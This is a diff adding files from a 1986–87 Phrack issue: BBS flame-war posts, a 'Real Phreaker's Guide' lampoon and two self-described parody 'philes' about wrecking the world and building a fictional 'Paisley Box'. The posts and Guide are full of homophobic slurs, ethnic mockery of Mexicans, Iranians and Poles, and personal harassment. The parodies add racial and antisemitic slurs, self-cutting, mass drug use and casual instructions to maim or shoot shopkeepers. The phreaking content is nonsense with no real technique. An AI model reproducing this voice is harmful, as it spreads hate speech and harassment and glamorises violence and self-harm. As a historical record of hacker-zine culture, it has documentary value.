+orientals like that, showing that you are in an ignorant chunk of muleflesh.
+And I could stereotype you, the polish, born of blue collar trash collectors.
+I am sure you go bowling and have bowling trophies mounted in glass cases in
+your cardboard house.  How is that dirt floor?  How is the bearskin door?  I
+know you are of low social stature and therefore do not know or even comprehend
+the social elegance that I am born and bred in.  So you can just take you and
+your $20000 income that your family makes and just save it for someone who is
+at your level.
+
+Is it true that the welfare lines are long?
+How was the goverment cheese giveaway?
+
+                                   The Sexyest Executioner
+
+
+Name: >UNKNOWN<
+Date: <-> INACTIVE <->
+
+As someone else already said: Please spare the rest of us users the pain of
+having to hit the space bar whenever the author of the message is 'Dr. Doom'
+or 'The Executioner', or whatever.  Geez...
+
+If all goes well, there'll be a K-K00L Ragging Subboard, and you people can
+just go there and tell the other person how k-radical you are, what a stud,
+how good looking, and what an asshole, loozer, rodent the other person is.  I
+think most of the other users, along with myself, are getting quite sick of
+all of this...After all: This *IS* the Phrack/Gossip board, right?  Yeah...
+
+[%] The Yakuza [%]
+
+
+Name: >UNKNOWN<
+Date: <-> INACTIVE <->
+
+What the HELL does your looks have to do with this, Exy?  It doesn't matter how
+'great' looking you are, because the board wasn't put up so you could tell us
+how much of a ladies man you are.  If you want to brag, put up your own board.
+And since your messages are directed to one person, USE THE FUCKING EMAIL
+COMMAND! thats what its there for.
+
+Some people..
+
+
+
+
+Name: The Executioner #47
+Date: 10:31 am  Sun Sep 14, 1986
+
+Ass kissing?  Please, spare me the vomit of your mouth huh bud?  Taran says
+something about ISDN and since I knew something about what he said, I decided
+to expand it into an explanation which is definately not ass kissing.  I don't
+kiss anyone's ass because I dont have to.  Taran does not delete me out of
+mutual respect I have for him and I should think he has for me.  Notice I don't
+use low-level words like "fuck" and "shit" and all the other terms that people
+with IQ's of a marble statue have.  So Dr. Doom is a good friend of yours huh?
+Probably your ONLY friend because both of you look like the Elephant Man....
+"I'm Noooooooot an ANIMAL!!!", don't worry Doc, Paper bags are still in.
+
+As for files, I have written my share, and really could care less whether or
+not you can read or not.  As for the PhoneLine Phantoms, we are not just a
+telecom group, we are comprised of the 4 best looking, studliest people.  When
+I heard about Doom, I said, well, I dunno, we will have to reduce our image of
+4 studs into 4 studs and 1 dud.  As for playing with my male organ, you must
+know more than I, considering you know all these nifty little sayings you must
+have thought up when you were raping that coke bottle.  As for calling Doom, I
+call when I get a deep feeling of pity abnd decide to enlighten the poor
+impoverished boy.
+
+So, why don't you, Doom, Master Vax (Circuit Breaker) go and slither back into
+your holes where you can fester and leave the REAL stuff to me and Culprit.
+
+And if you really wanna take this issue far, I propose a challenge.  I will
+send my picture to an unbiased third party and you do the same.  Then we will
+see who is the REAL Sexy-Exy.  Oh yeah, it's Mikey, not Mikie, and Exy, not
+Exie, and I prefer a "Mr. Executioner, sir" before you speak to me. I will just
+call you little peon...
+
+                             -The Executioner
+                           PhemalesLuv Phantoms!
+
+PS: People who belong to something cool can post it, those who can't, don't.
+
+Name: Taran King #1
+Date: 11:00 am  Sun Sep 14, 1986
+
+PLP vs. Everyone has to stop, guys...at least on the phreak board.  This is
+for telecommunications only.  If you really want, I can create a rag subboard
+so you can bitch all you want, but it's getting a bit tedious out here.  Exy,
+I know you have quite a bit of knowledge hidden somewhere in your mind, I've
+seen your philes, and they're decent.  Dr. Doom, I know you pretty well, and I
+thought the two philes I read were quite decent as well.
+
+How about a bit of unity in the crumbling phreak world that we know today, huh?
+It's already in shambles and people are getting totally bored of it, or are
+being busted.  Most of us on here have been around for at very least 6 months
+so that says something about us...I know Exy wouldn't mind a rag board, because
+he excells in it, but I'll leave the final decision to the users.  Go V:ote
+now, please, and stop posting rags...MORE INFO!!!
+
+-TK
+GETTING PISSED!
+
+
+Name: Dr. Doom #106
+Date: 5:48 pm  Sun Sep 14, 1986
+
+Well, I am going to change the discussion because I am quite (yawn...) tired
+of  this useless ragging.  (By the way I drive a sports car, live in an
+affluent neighborhood, and am not Polish but of English decent).  OK, like I
+was saying I am going to try to put a little life back into the Phreak World
+with a new Electronic Journal.  The Dr. Doom Journal of Telecommunications as
+I call it will center around topics and techniques that have not been readily
+discussed.  Although I will be doing a lot of writing (because I like to), I am
+looking for anyone else that might be interested in helping out.  One of the
+Departments will be like a mini-catalog of places where you can order all
+sorts of cool stuph from that has to do with Telecom, etc...  If you are
+interested or even have some places to order things from, send me mail.
+
+Later...
+Dr. Doom
+
+
+Name: Doc Holiday #19
+Date: 11:59 pm  Sat Sep 13, 1986
+
+Well, since I have been away, I have noticed a few changes, but some things
+will never change I guess.  Executioner is the same fag he's always been.  Big
+deal, he has expanded his ragging capabilities all the way to Texas with
+Dr. Doom, who happens to be a good friend of mine.  I have one question for
+you Mike, do you do anything else besides vegetate in front of your monitor
+and write songs about people?  You seemed to have a very good knowledge of the
+content of the "Hillbillies" song.  I guess that shows your level of intellect.
+
+I really dislike ragging so this is probably the only post that will deal with
+it.  If you have something to say to me, call me, if you can get my number I
+will be more than happy to toy around with you.  You are shit.  That is what I
+get out of all of this.  You rag on Dr. Doom's files but, have you ever written
+a file with useful information in it?  I seriously doubt it.  Some of Doom's
+files are so-so because I already know a lot of it, but many of his articles
+are actually quite informative.  Have you even read any of them?
+
+Also, why is it that you call him quite often every day?  Have you ever left
+your house or anything besides to ride the little school bus to get to school?
+That is very doubtful also.  Taran, why don't you just get rid of this nusance?
+Is he some sort of threat to you?  Anyway, Exie, about your brown-nosing, I see
+all of these rag posts of yours, then Taran posts something on ISDN and then
+you immediately post something on the topic, afterwhich you go back to ragging.
+If that isn't ass-kissing then explain to me what is.
+
+What about PLP, why do you even bother to exist?  I am speaking mainly to
+Carrier Culprit and The Executioner.   I remember being on three-way with CC
+and someone else whom I won't name, and listening to him say things about me.
+I have never even talked to the person before.  Then when I got on the line and
+talked with him, he didn't know anything.  I would ask about general telecom
+topics and he would say "I'm sorry, I don't know much about the phone network,
+I hack mostly", then I would ask something about hacking and he
+co-oincidentally couldn't remember his way around those systems very well
+because they weren't that important.  Did someone mention DEC?  They are a
+really nice company.  I am involved with them quite often.  I even use a DEC
+terminal to call places instead of a computer.  The Executioner probably thinks
+a DEC is something you play with every night before you go }to bed, because of
+his personal experiences.  He is a DEC (w)hacker, but anyways, I think I have
+made my point.
+
+  Doc Holiday
+
+PS:  Notice no fancy shit under name...sorry, but I don't take ego trips during
+     the off season.
+
+Name: The Executioner
+Date: 2:57 pm  Tue Sep 23, 1986
+
+                  ^                                        ^
+                / + \                                    / + \
+               /*TBC*\                                  /*TBC*\
+               |=====|__________________________________|=====|
+               |     |                                  |     |
+               ||||||| The Executioner & Egyptian Lover |||||||
+               |-----| -------------------------------- |-----|
+               | Rag | |     The Breakfast Club       | | Rag |
+               |Files| -------------------------------- |Files|
+               ################################################
+               %                                              %
+               %          Presenting: Rag Volume Four         %
+               %          ----------------------------        %
+               %%%%%%%%%%%| /\/\/\/\/\/\/\/\/\/\/\/\ |%%%%%%%%%
+               |        Arthur Dent: Third World Iranian      |
+               %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+
+                     There's this kid called Arthur Dent,
+                     He's got no money, not one red cent.
+                    Cool and Slick is what he wants to be,
+                      He even wants to be a part of LOD!
+                      His mother country, he calls Iran,
+                    He cleans camel stalls like no one can.
+                 All he wants, is to hang around with phreaks,
+                 But there's a law against third world geeks.
+              It says: "Get out of my country, get outta my land,
+             Go back to your people who make houses out of sand."
+                      Pack your bags and be on your way,
+                    We don't want you 'cuz you're all gay.
+                   You think you're cool 'cuz you can hack,
+                 I hate to tell you this, but bud you're wack.
+                   I saw your picture and boy are you lame,
+                 From under a rock is where I think you came.
+                 You cry "Hey Phucked agent, please teach me!"
+                    You annoy the poor man, don't you see?
+                     You try to impress everyone in sight,
+                     One look at you and we run in fright.
+                   Ain't it funny how your temper does fume,
+                     When I say I'm in the Legion of Doom.
+                   With a cardiac arrest, you get all hyper,
+               In case you piss in your pants, here's a diaper.
+                 Now, don't get mad from this little ol' rag,
+                   Just cover your face with a grocery bag.
+                   With a towel on your head you do declare,
+                   "Allah gimme a real life and real hair."
+                      Well, my iranian friend, I am done,
+                   I hope you don't mind me having some fun.
+         =============================================================
+The above is a rag I wrote a while back, I got alot of good feedback from it so
+I'd thought I'd have an encore presentation.
+
+The Executioner
+
+
+Name: The Executioner
+Date: 4:53 pm  Sun Oct 12, 1986
+
+Anyway, as to Quest, that little nuisance thinks he has a real bbs and he
+thinks just because I let him talk to me for 5 minutes he's my best friend.
+Frankly, I'd axe him just because he shows no sign of any capable action short
+of maybe masturbating his dog into a bowl of frozen tofu.
+
+Ciao
+
+Sexy
+
+
+Name: Arthur Dent
+Date: 11:06 pm  Mon Oct 13, 1986
+
+You mean PINK tofu, I think.  Read read the last message if you haven't the
+slightest
+
+dent
+
+
+Name: Knight Lightning
+Date: 10:46 pm  Sun Nov 23, 1986
+
+PLP Three-Way Con:
+
+Rich:  Hey Mike the board is going great!
+Mike:  Thats good, any new users today?
+Rich:  A few, I haven't validated them yet...
+Eric:  Ho hum...
+Mike:  Lets call some now and check them out.
+Rich:  Ok, hold on...
+Eric:  No Rich wait wait...
+Rich:  I'm going to click over to three way.
+Eric:  NO! Wait wait Rich hold on.
+Rich:  I'm Going toCLICK on my three way hold on!
+Mike:  Whats your problem Eric?
+Eric:  Wait Rich, will you just wait a minute!
+Rich:  Ok!?  What!?
+Eric:  Rich, (pause)  You're gey!
+Mike:  Eric, you are the Wack!
+Eric:  Shut up Mike!
+Mike:  What?  Hello, hello did you say something?  Hello hello?
+Eric:  Dag!
+
+:Knight Lightning
+
+
+From: SHERLOCK HOLMES
+Date: MON FEB 16  9:04:17 PM
+
+On a recent visit to The Iron Curtain, (I think that was the one).. well it was
+my first time on and they were talking about stuph like newsletters and things
+like that.. one post said something like this:
+
+"Okay... I know you guys have heard of TAP and 2600, well there is a new
+phreak/hack newsletter.  It's called Phrack [Please note that by this time
+Phrack X was already well underway and being distributed] try and get a file in
+it.  Phrack is all these files.  It looks really good.  I would try to get a
+file in there to impress your friends."
+
+Sherlock
+
+
+From: DOOM PROPHET
+Date: MON FEB 16  9:56:08 PM
+
+I think common sense should be used by the authors and editors of newsletters
+that get around, that is, not to overplay or exaggerate anything concerning
+someone's feats, or knowingly print invalid information while keeping the real
+information for themselves.  Of course, if the whole newsletter writing
+population (of which I am a part) started churning out idiotic files about
+idiotic things, then maybe the security people and rich business pigs would
+dismiss us as dumb kids.
+
+Example:
+!@#$%^&*()_+!@#$%^&*()_!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()+_!$#!
+
+
+
+                       HOW TO DISCONNECT SOMEONE'S LINE
+
+                                By KODE KID 100
+
+0k d00dz, just g0 t0 the f0ne line where it cumes out of the house and pull on
+it as hard as you can.  Then, the loze has his line disconnected until AT&T
+Repair service soldiers come to fix it.
+
+L8r111
+
+K0DE KID 1OO
+-The Marauders
+
+PS:  Call Digit/\|_  ITS *ELITE*,tonz of k0dez 4 *REAL* hackers!
+
+!$#@!!$^%$#&^%*^&(*^(&)(*___++((*_)&+(%^$%^#%$%$@%#$#%^#^%&#$^%&&%?<<?$&@#$%!@!
+
+
+78/81: A New Mod..
+From: THE LINEMAN
+Date: MON MAR 09  2:05:25 AM
+
+I have an idea for a mod that will save the users a hell of a lot of time.
+Howabout put an IF THEN statement when you are saving the message so that if
+the name is "ORYAN QUEST" then it won't save then we won't get rodenty G-File
+posts anymore.  Sound good?
+
+ciao
+The Lineman
+
+
+77/77: TMC...
+From: MARK TABAS
+Date: SAT MAR 14 12:05:38 AM
+
+I heard that if you crank a TMC code through the DES algorithm, and then
+through the Cristensen CRC-16 algorithm, followed by complementing its
+packed binary value and then encrypt it to "kl.LLL.hyuuuu" using the German
+enigma, you'll get a COSMOS dialup!
+
+Does anyone know if this works??????
+
+tabas
+_______________________________________________________________________________
+
+Well thats it, but before we go, here is a quick look at the vote section of
+Metal Shop Private:
+
+Question #3:  Should Oryan Quest be let back on?
+Users voting:   8.7%
+
+0:No Comment
+1:No.                       :  3  50.0%
+2:No.                       :  1  16.7%
+3:No.                       :  0   0.0%
+4:No.                       :  1  16.7%
+5:No.                       :  0   0.0%
+6:No.                       :  0   0.0%
+7:No.                       :  0   0.0%
+8:No.                       :  0   0.0%
+9:No.                       :  1  16.7%
+
+Your vote: No Comment
+Change it? Yes
+
+Which number (0-9) ? 1
+
+Current Standings:  Should Oryan Quest be let back on?
+Users voting:  10.1%
+
+1:No.                       :  4  57.1%
+2:No.                       :  1  14.3%
+3:No.                       :  0   0.0%
+4:No.                       :  1  14.3%
+5:No.                       :  0   0.0%
+6:No.                       :  0   0.0%
+7:No.                       :  0   0.0%
+8:No.                       :  0   0.0%
+9:No.                       :  1  14.3%
+
+
+                Majority of Posts Taken From Metal Shop Private
+                Some Posts Taken From The Lost City Of Atlantis
+_______________________________________________________________________________
+
diff --git a/phrack13/2.txt b/phrack13/2.txt
new file mode 100644
index 0000000..be460a6
--- /dev/null
+++ b/phrack13/2.txt
@@ -0,0 +1,129 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #2 of 10
+
+           _-><-_==_{[The REAL Phreaker's Guide Part II]}_==_-><-_
+                                      or
+                           How To/Not To Be Elite!
+
+                                  Written by
+
+                       Taran King and Knight Lightning
+
+         So, you're willing to give up EVERYTHING to be elite, huh?  Well,
+you've come to the right place.  We know from EXPERIENCE.  We know FIRST HAND.
+We know because we ARE ELITE (not elite, ELITE).
+         Some of you may recall our first version of this file which was
+released years ago.  That was when we were young and immature.  We are now
+much more mature and ELITE and you aren't so there.  Here's the file, learn
+it, love it, live it, leach it.
+
+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
+
+Real phreaks don't utilize anything pertaining to phreaking/hacking in their
+handles (Phantom PHREAKER, CODES Master, CODE Manipulator, Bill from RNOC,
+Perpetual PHREAK, Luke VAXHACKER, VMS Consultant, Holophax PHREAKER,
+Ubiquitous HACKER, Dr. HACK, PHREAKY Floyd, Broadway HACKER, The Mad HACKER,
+The PHREAKazoid, PHREAKenstein, Dan The OPERATOR, and ORYAN QUEST).
+
+Corollary:  Real phreaks or hackers don't have ORYAN QUEST in their name.
+
+Real phreaks don't get in trouble when people harass their parents (Phucked
+Agent 04, The Executioner, and Oryan Quest).
+
+Corollary:  Real phreaks don't name themselves Oryan Quest if they know that
+they're going to receive harassing phone calls.
+
+Real phreaks don't look like celebrities (Mark Tabas - Tom Petty, Shooting
+Shark - Mork from Ork, Telenet Bob - Danny Partridge (200 pounds later), John
+Draper - Marty Feldman in Young Frankenstein, The Executioner - All of the
+group members of Loudness, Broadway Hacker/The Whacko Cracko Bros. - Tommy
+Flenagan, Mr. Zenith's mother - Fred Sanford, The Lineman - Spanky, Sigmund
+Fraud - The Great Pumpkin, and Oryan Quest - the Mexican cab driver in D.C.
+Cab).
+
+Corollary:  Real phreaks didn't crawl under a fence to become a citizen of the
+United States of America.
+
+Real phreaks don't go to Tap (Dead Lord, Cheshire Catalyst, Sid Platt, and
+Oryan Quest).
+
+Corollary:  Real phreaks don't piss Taran King off so that they would get a
+rag file dedicated to them.
+
+Real phreaks don't name their group after a real phreak (New religion:
+Luthorian.)
+
+Real phreaks don't get busted and come back numerous times (The Whacko Cracko
+Bros., Dr. Who, Mark Tabas, Holophax Phreaker, and Oryan Quest).
+
+Real phreaks don't get kicked out of the FBI (Ahem!).
+
+Real phreaks can't speak 2600 in their normal, everyday voice (Ax Murderer,
+The Wizard, The Preacher, and Oryan Quest).
+
+Real phreaks don't have busha-bushas (Eric Corley, John Maxfield, The Bootleg,
+and not Oryan Quest's mother).
+
+Real phreaks aren't religious fanatics (The Preacher, The Pope, The Exorcist,
+Magnetic Pope, All Members of Cult of the Dead Cow, Mr. Zenith's mom, The
+Prophet, Lucifer 666, Angel of Destiny, and Satan [Oh, and Oryan Quest]).
+
+Real phreaks don't use vaseline for mousse (Oryan Quest).
+
+Real phreaks don't eat tacos for breakfast, burritos for lunch, and
+enchilladas for dinner (Oryan Quest).
+
+Corollary:  Real phreaks don't need to get the cheese for their Mexican dinner
+from the government (Oryan Quest).
+
+Real phreaks don't claim to get busted 3 times to make a good reputation as a
+phreaker or hacker for themselves (Oryan Quest).
+
+Real phreaks don't answer to "Paco" (Oryan Quest).
+
+Real phreaks don't use Maintenance Busy in an effort to unleash with full
+force (Oryan Quest).
+
+Real phreaks can rag on better things than an individual's mom (Oryan Quest).
+
+Real phreaks' caps lock didn't get stuck when signing their first message
+after they typed their first name (Oryan QUEST).
+
+Real phreaks don't claim to know more than 65% of the phreak world (Oryan
+Quest).
+
+Real phreaks don't have a girlfriend that needs to shave...their face (Oryan
+Quest).
+
+Real phreaks haven't been around for 4 years without accomplishing something
+(Oryan Quest).
+
+Real phreaks CAN'T argue with their parents in Spanish (Oryan Quest).
+
+Real phreaks don't:
+
+  Cash $5,000,000 checks.
+
+  Card minicomputers.
+
+  Card gold.
+
+  Get busted for hacking but let off due to police brutality (?!?).
+
+  Write books on the topic.
+
+  Say they're from outside of Illinois when working for Illinois Bell.
+
+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
+
+         You, the reader, must understand that this is all written with the
+very least in seriousness (except that written about Oryan Quest).  Anything
+contained in the file is just poking fun at people without trying to really
+make them feel bad (except for Oryan Quest).
+         To the various people that have contributed various pieces and bits
+to this file, we wish to extend great thanks for your innovativeness (or lack
+thereof).
+         Now, you too, can be ELITE.
+
+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
diff --git a/phrack13/3.txt b/phrack13/3.txt
new file mode 100644
index 0000000..52ca296
--- /dev/null
+++ b/phrack13/3.txt
@@ -0,0 +1,139 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #3 of 10
+
+/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\
+\|/                  How to fuck up the world                              \|/
+/|\                     Writen 10:03 pm December 2nd 1986                  /|\
+\|/              by the Neon Knights and Metal Communications              \|/
+/|\  Thanx to the Metallain,Zandar Zan,Marlbro Reds,ACID,The High Lord     /|\
+\|/  Satan,Apple Maniac,The Necrophiliac&The Necrophobic (for theri awesome\|/
+/|\  dox-file skils),SLayer,Megadeth,Overkill,Samhain,The Misfits (fuck yea/|\
+\|/  Hi Glenn!),The Blade,Killer Kurt,and Steve Wozniak even thouhg hes a  \|/
+/|\                               wimp!                                    /|\
+\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
+/|\                        Fuck off all niggers jews commusnists retarted  /|\
+\|/  arabians peopel who dont own computers and any welfare starving shit  \|/
+/|\  headed bastard who doesnt have an Applecat modem!                     /|\
+\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
+/|\   Im not even going to write a list of boards for you to call. Well    /|\
+\|/    what the fuck I guess I will put at least one.....                  \|/
+/|\   Call the Metal AE  (201)-(879)-(666)-(8) for the latest in Neon      /|\
+\|/     Knights wares and for a cool board/cool sysop/cool wares/just all  \|/
+/|\                          around cool!                                  /|\
+\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
+
+ The Phile itself:
+
+When your like me and get bored eassily its veryt hard to keep fuctiong the way
+your parents expet you to. I would go out with Killer Kurt all the time and dest
+roy evrything we coiuld find that looked stupid,get drunk off my ass,trip on aci
+d(like im doing righ now),use the necronimiconm to summon a watcher to kill my t
+eachewrs my douchbag bratty sister and the fat sickining son of a bitch that liv
+es next door to me,and my parents would very rarely do anything to try to stop m
+e. i gues they just thought i was goin throuhg a phase or sometihg like that. We
+ll I finalyl hit upon the perfect combination of things to do that not only get
+your parents to reac, the are a hell of a lot of fun and cause so much evil, cha
+os, and havoc that Satan will be sure to reservbe a good seat in Hell for you. S
+o now Here are step by stpe instructins on HOW TO FUCK UP THE WORLD
+
+Step one:Get.a large supply fo plastics garbage bags, gas or other very flammabl
+le shit,and a flamsthrower or somet other way to light fires from a distance (ju
+st to make sure you dont die yourself before your ready).Also i forgot to mentio
+n,take a good amount of drugs befoere you start doin this so youll be able to fi
+nish what you start.I reccommend about three hits of blotter acid (4way album co
+ver is best,thats what i use),about 2 grams of weed (smoked),some mescaline if y
+ou can get it (arizona is a great place to pick it yourself),and of course the g
+ood old american tradition of JACK DANIELS. Most people mix this with coke but I
+have invented a new way to do it,which ya do by mixing it with JOLT cola instead
+. tHIS (godamn fuckin caps lock key) will get you really goin, you may want to
+use some speed as well so you dont pass out and some ludes or other type of down
+er just to keep you balancd well. now make sure you can still stand up (once you
+get that far the rest will come naturaly) and get in yer pickup (if you dont hav
+e a pickup there is no hope for ya!) and drive. Oh remember to take the gas, bag
+s, and light with you.
+
+Step two: Drive to a secluded area and preparew for your assault on the armies o
+f the conformist bastards. What your gonna be doin here is summoning a demon. Th
+is is one of the waeker types according to the Necromnicon so you can control it
+easily in your druged state but powerful enouhg to actually be of use to ya. So
+draw yer pentagram on the ground,get a Slayer tapepl aying (no motley crue!!! or
+the demon will laugh its ass off at you before killing you and eating your soul.
+Adn thats a big waste of time  not to mention no fun at all.) set candles at all
+cardinal points and cut a long incision down the lenght of your arm about frmo
+mid-bicep to just before your wrist as you dont want to bleed to death,just enou
+gh to get about 3/4 of a pint or so. Drip all this blood inside the pent.,and ch
+ant the following:
+       "YOGGIH PPEDRILS, STOWART EHNTAHL SHILGLI DRAGGULS UOHT!"
+Say this5 times and you shoukld noteice the candles flikckering (hmm i blieve th
+e rrUSH is starting to come on nwo, this sucker relly was worht 40 a sheet!!)! B
+y the way that shit up there that ya say is not nay kind of backjwards bullshit,
+it is the real stuff. I paid 40 bux for my copy of the youknowwhat so i oughtta
+know. now where was i o yeah. Onece the damn thing appears thjen you gotta estab
+lish control over it real qiock before it start getting any ideas. by the way in
+caser you wodering what it will look like it is a big motherfucker approx. 20 fe
+eet tall with green leathery sking. If you get the wrong one it doesnt really ma
+tter that much anywayt since youll be dyin soon but it helps. so now get it to f
+ly along above yer truck (tell it to be invisible so ya dont have peopl starin a
+t ya!) and drive back to whereever it is that your gonna destroy.
+
+Step three: stop back at yer house wreal quick and pick up the follwng. If you d
+ont have all this at house then just go by a hardware storte and a drugstore and
+picjk it up. if the owner objkects then just take out his kneecaps with your cro
+wbar and he wont be goin anywhere for a long time.
+30 dozen hammers
+50 gallons of paint (asorted colors is nice but not necesary)
+(jesus this is weird, have any of you ever seen ther letters on yer screen wiggl
+ing and boucing  didnt think so!!) now where was i/
+5-10 tanks of propane
+100+ gallons of gas (for a seperate use than the gas i alreadyu mentiond)
+
+from the drugstore,or your closet if your like me and keep a constant supply of
+every kind of drug ever made):
+1,000 doses of pseudoephedrine (there we go,i spelled it right! well ive got the
+catalog next to me so fuck it anyway,it doesnt mean shit.neuither does your mama
+. i think im getting off track - wel then again it is kind og amazing cause my
+ingers are twichin so bad)
+5,000 doses of LSD
+250 doses of qualudes
+600 cases of JACK DANIELS
+
+ok now for the good part. Consume all of these yourself! HAAHAHA! i bet you thou
+ght you were suposed to put them in the citys water supply or soething! but now
+you better get moving cause this is all gonna take effect within the hour! but i
+f ya wanna save some to put in the citywater then go ahead,you wont have quite a
+s much fun but who the fuck am i to tell you exactly how to do things.
+
+Step four: Drive to the heart of the city. on the way see how many little old la
+dies and fag poodles ya can hit. When ya get to the talest building in town smas
+h into a fire hydrant in front of it. now get out and run like a bitch *just hav
+e the demon carry all the shit for ya*! and go to the FUCKEN TOP of the building
+. here is where you do all this.
+Make the demon inhale all the propane, and give him the smaler amount of gas (th
+e one I talked about first..go back about 70 lins or so./) to drionk. Now hes al
+l set. now YOU have to get on his back. make him carry the hammers and paint and
+the largetr amount of gas. Have him take off and fly all over the city aas he fl
+ys just throw hammers down at building windows and people and paint at both of t
+hose too! Now i bet you thinking i forgot all about those garbage bags and the f
+lamethrowr. Hell no i didnt! with the little bit of propane hes got left have hi
+m blow up the bags so they make a giant baloon. now you take the big amount of g
+as and drink it (after all those other drugs it should be a smnap!) and jump. Wi
+th your weight off him and all that propane in him and with that baloon he will
+instantly take off straight up into heaven, where he will cause some wicked shit
+to happen! As for you, you will fly down and hit the ground, and be goin so fast
+that you go right through all the way to Hell. Once you get there all the gas in
+you will ingite and BOOM! Satan will be proud of you for sure! a perfect ending
+to a perfect day!
+
+/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\
+\|/   Keep those credits up there excatly as they are (inother words,puttin\|/
+/|\ your K-K00l board up there WONT be tolerated!) or we will fuck you up. /|\
+\|/ If ya dont believe us by now your retarted.           -Killer Kurt     \|/
+/|\            -And the rest of the 'knights!                              /|\
+\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\
+/|\          Copywrit 1986 by Neon Knights/Metal Communications/           /|\
+\|/                           Black Death/No Love                          \|/
+/|\                      We're rad...we kill children!                     /|\
+\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
+
+Oh, and by the way, the above file was a parody by UrLord, Thomas Covenant.
diff --git a/phrack13/4.txt b/phrack13/4.txt
new file mode 100644
index 0000000..3426705
--- /dev/null
+++ b/phrack13/4.txt
@@ -0,0 +1,133 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #4 of 10
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+/|\      the Neon Fucken Knights    /|\
+\|/   present with no alternative   \|/
+/|\HOW TO BUILD A PAISLEY BOX!      /|\
+\|/   by the fucked up Blade        \|/
+
+~~~~~~~~~~~~~~~~~~~~~
+
+All right, so i mfucken in 40 cols..what's it matter? i just
+realized that many idoits out ther still dont know how to make one of
+the greatest anarchiust tools ever, the Paisley Box. This little
+beauty will do just about anuyt6hing ya want, including:
+--Seize operator lines
+--Remote control over all TSPS and TOPS consols
+--All other box functions combind in oine, includin blue, beige, and
+blotto
+
+so ya wanna know how to build this fucker and go out terrorizin ma
+bell..well sit tight, we wont bother with any fucken diagrams cause
+those are for dweebs (right necro? right!) here we go!
+
+first of all get about 20 lbs of quality drugs and 3 or 4 kegs. you
+might
+think that you need this for the contruction of the box but, you don't
+you take it all yerself!!
+this will mellow ya out enuf to follow our planz. lessee, oh yea
+parts list:
+ --about 50 ffeet of copper wier, hopfully insulated
+ --an old (prefer touchton) phone that ya dont need no more
+ --a honda genorateer (don't pay for it, just card it. right necro?
+right!)
+ --and one of the empty kegs that ya drank to put it all in. the
+genarater will fit fine and the rest ya can attach to the outsid if
+thats your fucken urge.
+
+now for tha actualy construciton details:
+
+oh shit, we forgot one fuckin thing. go to you local hadware stoer and
+find the guy who owns it, get a gun and blow his fuckin head off (you
+can card the gun two) this isn't for the box but, it fun and it will
+make satan happy so yor box will work better.
+
+now with the empty keg and all the stuf we put up there ( i think
+about 20 lins ofr so up )_ attach the genarater to all the other shit
+however ya please, now get some nice paisley wallpaper from your mom
+9(steal it if she wants it still) and put it all on the oputsid of teh
+keg. you now have a 100% genuine Neon Knights approvd Paisley Box!
+
+How touse:
+
+hook that son of a bithc up to yir modem (thats only if you got a 212
+cat. if you don't then you are an asshole anyway and the box will
+blow you fucken house aprt but, satan will be happy.)
+
+now turn yer dam computer on, and when the prkmpt comes up(
+hardwird into the box of cors! whatdday think we are, stupid? )
+type: 666 (space) SATAN RULES (space) MY SWEET SATAN!
+
+then the menu will coume up on you screen and it will say.
+
+1) fuck the operator around
+2) take control of the pentagon
+3) imitatte boxes (blue, blotto)
+4) fuck-a-geek
+
+choose whatever ya want, except if ya get tired of it and want to
+trash th thing type 666 for a choice. the box will sef destructt, yer
+computer will explod, anmd in its trahsing death throes speak an
+chant taht will summon satan to take you away to the depths of
+HELL!!!
+
+ use this masterpece proerly, and remember: NO FUCKEN LOSERS!
+
+`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
+
+Call these genocidal systemz:
+
+The Gatest of Hell 555-51325-634637-3
+  1200 ONLY DAMMIT!
+Mephisto's Suicidal Nightmare  2436-234-666 (of course!)
+ 1200 ONLY DAMMIT!
+The Dead Fuckers Realm 2436-99-2309
+ 300 only for now (dammit!)
+
+sorry for the sloppy look compared to our usual k00l neat files, but my
+computer got confiscate d by the fucke n pigs so i have to
+telerwit this fucker usin a dumb terminal, until i card another!
+should be within the week!
+
+but don't forget to call the rad Metal AE
+201-879-[666]8 9600 baud only (god fuckin dammit) 4 drives with 710
+megs soon (we promise this time).
+Kneon Nights "We're Rad, we kill children!!"
+
+
+end of file
+
+
+
+i said end of file dammit!
+
+
+
+
+
+what are you still fucken readin for? hit escape you stupid
+shithead!
+
+
+if you dont fucken hit escape i will call satan on you!!!
+
+fuck the dead!
+
+         ***
+         ***
+         ***
+         ***
+     ***********
+     ***********
+         ***
+         ***
+
+ Oral roberts is the anti-christ!!!
+
+oh and remember: this has been a fucken parody from thomas fucken
+covenant and double fucken helix. Call Thieve's World, the last
+bastion of free thought: 616-344-2718.
+
+"Whaddya mean I don't believe in God? ... I talk to him every day!"
